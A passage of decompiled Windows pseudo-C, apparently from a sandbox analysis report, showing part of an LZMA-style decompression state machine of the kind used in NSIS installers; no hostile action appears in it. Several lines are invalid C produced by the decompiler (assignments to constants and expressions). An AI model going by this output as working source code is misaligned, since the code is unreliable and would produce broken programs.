                                                                  												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                  												goto L23;
                                                                  											}
                                                                  											 *(_t613 - 0x74) = _t546;
                                                                  											if( *(_t613 - 8) != 0) {
                                                                  												GlobalFree( *(_t613 - 8));
                                                                  											}
                                                                  											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                  											 *(_t613 - 8) = _t534;
                                                                  											if(_t534 == 0) {
                                                                  												goto L171;
                                                                  											} else {
                                                                  												goto L20;
                                                                  											}
                                                                  										case 2:
                                                                  											L24:
                                                                  											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                  											 *(_t613 - 0x84) = 6;
                                                                  											 *(_t613 - 0x4c) = _t553;
                                                                  											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                  											 *(_t613 - 0x54) = _t606;
                                                                  											goto L133;
                                                                  										case 3:
                                                                  											L21:
                                                                  											__eflags =  *(_t613 - 0x6c);
                                                                  											if( *(_t613 - 0x6c) == 0) {
                                                                  												 *(_t613 - 0x88) = 3;
                                                                  												goto L170;
                                                                  											}
                                                                  											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                  											_t67 = _t613 - 0x70;
                                                                  											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                  											__eflags =  *_t67;
                                                                  											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                  											L23:
                                                                  											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                  											if( *(_t613 - 0x48) != 0) {
                                                                  												goto L21;
                                                                  											}
                                                                  											goto L24;
                                                                  										case 4:
                                                                  											L133:
                                                                  											_t531 =  *_t606;
                                                                  											_t589 = _t531 & 0x0000ffff;
                                                                  											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                  											if( *(_t613 - 0xc) >= _t565) {
                                                                  												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                  												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                  												 *(_t613 - 0x40) = 1;
                                                                  												_t532 = _t531 - (_t531 >> 5);
                                                                  												 *_t606 = _t532;
                                                                  											} else {
                                                                  												 *(_t613 - 0x10) = _t565;
                                                                  												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                  												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                  											}
                                                                  											if( *(_t613 - 0x10) >= 0x1000000) {
                                                                  												goto L139;
                                                                  											}
                                                                  										case 5:
                                                                  											goto L137;
                                                                  										case 6:
                                                                  											__edx = 0;
                                                                  											__eflags =  *(__ebp - 0x40);
                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                  												__eax =  *(__ebp - 4);
                                                                  												__ecx =  *(__ebp - 0x38);
                                                                  												 *(__ebp - 0x34) = 1;
                                                                  												 *(__ebp - 0x84) = 7;
                                                                  												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                  												while(1) {
                                                                  													 *(_t613 - 0x54) = _t606;
                                                                  													goto L133;
                                                                  												}
                                                                  											}
                                                                  											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                  											__esi =  *(__ebp - 0x60);
                                                                  											__cl = 8;
                                                                  											__cl = 8 -  *(__ebp - 0x3c);
                                                                  											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                  											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                  											__ecx =  *(__ebp - 0x3c);
                                                                  											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                  											__ecx =  *(__ebp - 4);
                                                                  											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                  											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                  											__eflags =  *(__ebp - 0x38) - 4;
                                                                  											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                  											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                  											if( *(__ebp - 0x38) >= 4) {
                                                                  												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                  												if( *(__ebp - 0x38) >= 0xa) {
                                                                  													_t98 = __ebp - 0x38;
                                                                  													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                  													__eflags =  *_t98;
                                                                  												} else {
                                                                  													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                  												}
                                                                  											} else {
                                                                  												 *(__ebp - 0x38) = 0;
                                                                  											}
                                                                  											__eflags =  *(__ebp - 0x34) - __edx;
                                                                  											if( *(__ebp - 0x34) == __edx) {
                                                                  												__ebx = 0;
                                                                  												__ebx = 1;
                                                                  												goto L61;
                                                                  											} else {
                                                                  												__eax =  *(__ebp - 0x14);
                                                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                  												__eflags = __eax -  *(__ebp - 0x74);
                                                                  												if(__eax >=  *(__ebp - 0x74)) {
                                                                  													__eax = __eax +  *(__ebp - 0x74);
                                                                  													__eflags = __eax;
                                                                  												}
                                                                  												__ecx =  *(__ebp - 8);
                                                                  												__ebx = 0;
                                                                  												__ebx = 1;
                                                                  												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                  												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                  												goto L41;
                                                                  											}
                                                                  										case 7:
                                                                  											__eflags =  *(__ebp - 0x40) - 1;
                                                                  											if( *(__ebp - 0x40) != 1) {
                                                                  												__eax =  *(__ebp - 0x24);
                                                                  												 *(__ebp - 0x80) = 0x16;
                                                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                  												__eax =  *(__ebp - 0x28);
                                                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                  												__eax =  *(__ebp - 0x2c);
                                                                  												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                  												__eax = 0;
                                                                  												__eflags =  *(__ebp - 0x38) - 7;
                                                                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                  												__al = __al & 0x000000fd;
                                                                  												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                  												__eax =  *(__ebp - 4);
                                                                  												__eax =  *(__ebp - 4) + 0x664;
                                                                  												__eflags = __eax;
                                                                  												 *(__ebp - 0x58) = __eax;
                                                                  												goto L69;
                                                                  											}
                                                                  											__eax =  *(__ebp - 4);
                                                                  											__ecx =  *(__ebp - 0x38);
                                                                  											 *(__ebp - 0x84) = 8;
                                                                  											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                  											while(1) {
                                                                  												 *(_t613 - 0x54) = _t606;
                                                                  												goto L133;
                                                                  											}
                                                                  										case 8:
                                                                  											goto L0;
                                                                  										case 9:
                                                                  											__eflags =  *(__ebp - 0x40);
                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                  												goto L89;
                                                                  											}
                                                                  											__eflags =  *(__ebp - 0x60);
                                                                  											if( *(__ebp - 0x60) == 0) {
                                                                  												goto L171;
                                                                  											}
                                                                  											__eax = 0;
                                                                  											__eflags =  *(__ebp - 0x38) - 7;
                                                                  											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                  											__eflags = _t258;
                                                                  											0 | _t258 = _t258 + _t258 + 9;
                                                                  											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                  											goto L75;
                                                                  										case 0xa:
                                                                  											__eflags =  *(__ebp - 0x40);
                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                  												__eax =  *(__ebp - 4);
                                                                  												__ecx =  *(__ebp - 0x38);
                                                                  												 *(__ebp - 0x84) = 0xb;
                                                                  												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                  												while(1) {
                                                                  													 *(_t613 - 0x54) = _t606;
                                                                  													goto L133;
                                                                  												}
                                                                  											}
                                                                  											__eax =  *(__ebp - 0x28);
                                                                  											goto L88;
                                                                  										case 0xb:
                                                                  											__eflags =  *(__ebp - 0x40);
                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                  												__ecx =  *(__ebp - 0x24);
                                                                  												__eax =  *(__ebp - 0x20);
                                                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                  											} else {
                                                                  												__eax =  *(__ebp - 0x24);
                                                                  											}
                                                                  											__ecx =  *(__ebp - 0x28);
                                                                  											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                  											L88:
                                                                  											__ecx =  *(__ebp - 0x2c);
                                                                  											 *(__ebp - 0x2c) = __eax;
                                                                  											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                  											L89:
                                                                  											__eax =  *(__ebp - 4);
                                                                  											 *(__ebp - 0x80) = 0x15;
                                                                  											__eax =  *(__ebp - 4) + 0xa68;
                                                                  											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                  											goto L69;
                                                                  										case 0xc:
                                                                  											L99:
                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                  												 *(__ebp - 0x88) = 0xc;
                                                                  												goto L170;
                                                                  											}
                                                                  											__ecx =  *(__ebp - 0x70);
                                                                  											__eax =  *(__ebp - 0xc);
                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											_t334 = __ebp - 0x70;
                                                                  											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                  											__eflags =  *_t334;
                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											__eax =  *(__ebp - 0x2c);
                                                                  											goto L101;
                                                                  										case 0xd:
                                                                  											L37:
                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                  												 *(__ebp - 0x88) = 0xd;
                                                                  												goto L170;
                                                                  											}
                                                                  											__ecx =  *(__ebp - 0x70);
                                                                  											__eax =  *(__ebp - 0xc);
                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											_t122 = __ebp - 0x70;
                                                                  											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                  											__eflags =  *_t122;
                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											L39:
                                                                  											__eax =  *(__ebp - 0x40);
                                                                  											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                  											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                  												goto L48;
                                                                  											}
                                                                  											__eflags = __ebx - 0x100;
                                                                  											if(__ebx >= 0x100) {
                                                                  												goto L54;
                                                                  											}
                                                                  											L41:
                                                                  											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                  											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                  											__ecx =  *(__ebp - 0x58);
                                                                  											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                  											 *(__ebp - 0x48) = __eax;
                                                                  											__eax = __eax + 1;
                                                                  											__eax = __eax << 8;
                                                                  											__eax = __eax + __ebx;
                                                                  											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                  											__ax =  *__esi;
                                                                  											 *(__ebp - 0x54) = __esi;
                                                                  											__edx = __ax & 0x0000ffff;
                                                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                  											if( *(__ebp - 0xc) >= __ecx) {
                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                  												__cx = __ax;
                                                                  												 *(__ebp - 0x40) = 1;
                                                                  												__cx = __ax >> 5;
                                                                  												__eflags = __eax;
                                                                  												__ebx = __ebx + __ebx + 1;
                                                                  												 *__esi = __ax;
                                                                  											} else {
                                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                  												 *(__ebp - 0x10) = __ecx;
                                                                  												0x800 = 0x800 - __edx;
                                                                  												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                  												__ebx = __ebx + __ebx;
                                                                  												 *__esi = __cx;
                                                                  											}
                                                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  											 *(__ebp - 0x44) = __ebx;
                                                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  												goto L39;
                                                                  											} else {
                                                                  												goto L37;
                                                                  											}
                                                                  										case 0xe:
                                                                  											L46:
                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                  												 *(__ebp - 0x88) = 0xe;
                                                                  												goto L170;
                                                                  											}
                                                                  											__ecx =  *(__ebp - 0x70);
                                                                  											__eax =  *(__ebp - 0xc);
                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											_t156 = __ebp - 0x70;
                                                                  											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                  											__eflags =  *_t156;
                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											while(1) {
                                                                  												L48:
                                                                  												__eflags = __ebx - 0x100;
                                                                  												if(__ebx >= 0x100) {
                                                                  													break;
                                                                  												}
                                                                  												__eax =  *(__ebp - 0x58);
                                                                  												__edx = __ebx + __ebx;
                                                                  												__ecx =  *(__ebp - 0x10);
                                                                  												__esi = __edx + __eax;
                                                                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                  												__ax =  *__esi;
                                                                  												 *(__ebp - 0x54) = __esi;
                                                                  												__edi = __ax & 0x0000ffff;
                                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                  													__cx = __ax;
                                                                  													_t170 = __edx + 1; // 0x1
                                                                  													__ebx = _t170;
                                                                  													__cx = __ax >> 5;
                                                                  													__eflags = __eax;
                                                                  													 *__esi = __ax;
                                                                  												} else {
                                                                  													 *(__ebp - 0x10) = __ecx;
                                                                  													0x800 = 0x800 - __edi;
                                                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                  													__ebx = __ebx + __ebx;
                                                                  													 *__esi = __cx;
                                                                  												}
                                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  												 *(__ebp - 0x44) = __ebx;
                                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  													continue;
                                                                  												} else {
                                                                  													goto L46;
                                                                  												}
                                                                  											}
                                                                  											L54:
                                                                  											_t173 = __ebp - 0x34;
                                                                  											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                  											__eflags =  *_t173;
                                                                  											goto L55;
                                                                  										case 0xf:
                                                                  											L58:
                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                  												 *(__ebp - 0x88) = 0xf;
                                                                  												goto L170;
                                                                  											}
                                                                  											__ecx =  *(__ebp - 0x70);
                                                                  											__eax =  *(__ebp - 0xc);
                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											_t203 = __ebp - 0x70;
                                                                  											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                  											__eflags =  *_t203;
                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											L60:
                                                                  											__eflags = __ebx - 0x100;
                                                                  											if(__ebx >= 0x100) {
                                                                  												L55:
                                                                  												__al =  *(__ebp - 0x44);
                                                                  												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                  												goto L56;
                                                                  											}
                                                                  											L61:
                                                                  											__eax =  *(__ebp - 0x58);
                                                                  											__edx = __ebx + __ebx;
                                                                  											__ecx =  *(__ebp - 0x10);
                                                                  											__esi = __edx + __eax;
                                                                  											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                  											__ax =  *__esi;
                                                                  											 *(__ebp - 0x54) = __esi;
                                                                  											__edi = __ax & 0x0000ffff;
                                                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                  											if( *(__ebp - 0xc) >= __ecx) {
                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                  												__cx = __ax;
                                                                  												_t217 = __edx + 1; // 0x1
                                                                  												__ebx = _t217;
                                                                  												__cx = __ax >> 5;
                                                                  												__eflags = __eax;
                                                                  												 *__esi = __ax;
                                                                  											} else {
                                                                  												 *(__ebp - 0x10) = __ecx;
                                                                  												0x800 = 0x800 - __edi;
                                                                  												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                  												__ebx = __ebx + __ebx;
                                                                  												 *__esi = __cx;
                                                                  											}
                                                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  											 *(__ebp - 0x44) = __ebx;
                                                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  												goto L60;
                                                                  											} else {
                                                                  												goto L58;
                                                                  											}
                                                                  										case 0x10:
                                                                  											L109:
                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                  												 *(__ebp - 0x88) = 0x10;
                                                                  												goto L170;
                                                                  											}
                                                                  											__ecx =  *(__ebp - 0x70);
                                                                  											__eax =  *(__ebp - 0xc);
                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											_t365 = __ebp - 0x70;
                                                                  											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                  											__eflags =  *_t365;
                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											goto L111;
                                                                  										case 0x11:
                                                                  											L69:
                                                                  											__esi =  *(__ebp - 0x58);
                                                                  											 *(__ebp - 0x84) = 0x12;
                                                                  											while(1) {
                                                                  												 *(_t613 - 0x54) = _t606;
                                                                  												goto L133;
                                                                  											}
                                                                  										case 0x12:
                                                                  											__eflags =  *(__ebp - 0x40);
                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                  												__eax =  *(__ebp - 0x58);
                                                                  												 *(__ebp - 0x84) = 0x13;
                                                                  												__esi =  *(__ebp - 0x58) + 2;
                                                                  												while(1) {
                                                                  													 *(_t613 - 0x54) = _t606;
                                                                  													goto L133;
                                                                  												}
                                                                  											}
                                                                  											__eax =  *(__ebp - 0x4c);
                                                                  											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                  											__ecx =  *(__ebp - 0x58);
                                                                  											__eax =  *(__ebp - 0x4c) << 4;
                                                                  											__eflags = __eax;
                                                                  											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                  											goto L130;
                                                                  										case 0x13:
                                                                  											__eflags =  *(__ebp - 0x40);
                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                  												_t469 = __ebp - 0x58;
                                                                  												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                  												__eflags =  *_t469;
                                                                  												 *(__ebp - 0x30) = 0x10;
                                                                  												 *(__ebp - 0x40) = 8;
                                                                  												L144:
                                                                  												 *(__ebp - 0x7c) = 0x14;
                                                                  												goto L145;
                                                                  											}
                                                                  											__eax =  *(__ebp - 0x4c);
                                                                  											__ecx =  *(__ebp - 0x58);
                                                                  											__eax =  *(__ebp - 0x4c) << 4;
                                                                  											 *(__ebp - 0x30) = 8;
                                                                  											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                  											L130:
                                                                  											 *(__ebp - 0x58) = __eax;
                                                                  											 *(__ebp - 0x40) = 3;
                                                                  											goto L144;
                                                                  										case 0x14:
                                                                  											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                  											__eax =  *(__ebp - 0x80);
                                                                  											 *(_t613 - 0x88) = _t533;
                                                                  											goto L1;
                                                                  										case 0x15:
                                                                  											__eax = 0;
                                                                  											__eflags =  *(__ebp - 0x38) - 7;
                                                                  											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                  											__al = __al & 0x000000fd;
                                                                  											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                  											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                  											goto L120;
                                                                  										case 0x16:
                                                                  											__eax =  *(__ebp - 0x30);
                                                                  											__eflags = __eax - 4;
                                                                  											if(__eax >= 4) {
                                                                  												_push(3);
                                                                  												_pop(__eax);
                                                                  											}
                                                                  											__ecx =  *(__ebp - 4);
                                                                  											 *(__ebp - 0x40) = 6;
                                                                  											__eax = __eax << 7;
                                                                  											 *(__ebp - 0x7c) = 0x19;
                                                                  											 *(__ebp - 0x58) = __eax;
                                                                  											goto L145;
                                                                  										case 0x17:
                                                                  											L145:
                                                                  											__eax =  *(__ebp - 0x40);
                                                                  											 *(__ebp - 0x50) = 1;
                                                                  											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                  											goto L149;
                                                                  										case 0x18:
                                                                  											L146:
                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                  												 *(__ebp - 0x88) = 0x18;
                                                                  												goto L170;
                                                                  											}
                                                                  											__ecx =  *(__ebp - 0x70);
                                                                  											__eax =  *(__ebp - 0xc);
                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											_t484 = __ebp - 0x70;
                                                                  											 *_t484 =  *(__ebp - 0x70) + 1;
                                                                  											__eflags =  *_t484;
                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											L148:
                                                                  											_t487 = __ebp - 0x48;
                                                                  											 *_t487 =  *(__ebp - 0x48) - 1;
                                                                  											__eflags =  *_t487;
                                                                  											L149:
                                                                  											__eflags =  *(__ebp - 0x48);
                                                                  											if( *(__ebp - 0x48) <= 0) {
                                                                  												__ecx =  *(__ebp - 0x40);
                                                                  												__ebx =  *(__ebp - 0x50);
                                                                  												0 = 1;
                                                                  												__eax = 1 << __cl;
                                                                  												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                  												__eax =  *(__ebp - 0x7c);
                                                                  												 *(__ebp - 0x44) = __ebx;
                                                                  												while(1) {
                                                                  													 *(_t613 - 0x88) = _t533;
                                                                  													goto L1;
                                                                  												}
                                                                  											}
                                                                  											__eax =  *(__ebp - 0x50);
                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                  											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                  											__eax =  *(__ebp - 0x58);
                                                                  											__esi = __edx + __eax;
                                                                  											 *(__ebp - 0x54) = __esi;
                                                                  											__ax =  *__esi;
                                                                  											__edi = __ax & 0x0000ffff;
                                                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                  											if( *(__ebp - 0xc) >= __ecx) {
                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                  												__cx = __ax;
                                                                  												__cx = __ax >> 5;
                                                                  												__eax = __eax - __ecx;
                                                                  												__edx = __edx + 1;
                                                                  												__eflags = __edx;
                                                                  												 *__esi = __ax;
                                                                  												 *(__ebp - 0x50) = __edx;
                                                                  											} else {
                                                                  												 *(__ebp - 0x10) = __ecx;
                                                                  												0x800 = 0x800 - __edi;
                                                                  												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                  												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                  												 *__esi = __cx;
                                                                  											}
                                                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  												goto L148;
                                                                  											} else {
                                                                  												goto L146;
                                                                  											}
                                                                  										case 0x19:
                                                                  											__eflags = __ebx - 4;
                                                                  											if(__ebx < 4) {
                                                                  												 *(__ebp - 0x2c) = __ebx;
                                                                  												L119:
                                                                  												_t393 = __ebp - 0x2c;
                                                                  												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                  												__eflags =  *_t393;
                                                                  												L120:
                                                                  												__eax =  *(__ebp - 0x2c);
                                                                  												__eflags = __eax;
                                                                  												if(__eax == 0) {
                                                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                  													goto L170;
                                                                  												}
                                                                  												__eflags = __eax -  *(__ebp - 0x60);
                                                                  												if(__eax >  *(__ebp - 0x60)) {
                                                                  													goto L171;
                                                                  												}
                                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                  												__eax =  *(__ebp - 0x30);
                                                                  												_t400 = __ebp - 0x60;
                                                                  												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                  												__eflags =  *_t400;
                                                                  												goto L123;
                                                                  											}
                                                                  											__ecx = __ebx;
                                                                  											__eax = __ebx;
                                                                  											__ecx = __ebx >> 1;
                                                                  											__eax = __ebx & 0x00000001;
                                                                  											__ecx = (__ebx >> 1) - 1;
                                                                  											__al = __al | 0x00000002;
                                                                  											__eax = (__ebx & 0x00000001) << __cl;
                                                                  											__eflags = __ebx - 0xe;
                                                                  											 *(__ebp - 0x2c) = __eax;
                                                                  											if(__ebx >= 0xe) {
                                                                  												__ebx = 0;
                                                                  												 *(__ebp - 0x48) = __ecx;
                                                                  												L102:
                                                                  												__eflags =  *(__ebp - 0x48);
                                                                  												if( *(__ebp - 0x48) <= 0) {
                                                                  													__eax = __eax + __ebx;
                                                                  													 *(__ebp - 0x40) = 4;
                                                                  													 *(__ebp - 0x2c) = __eax;
                                                                  													__eax =  *(__ebp - 4);
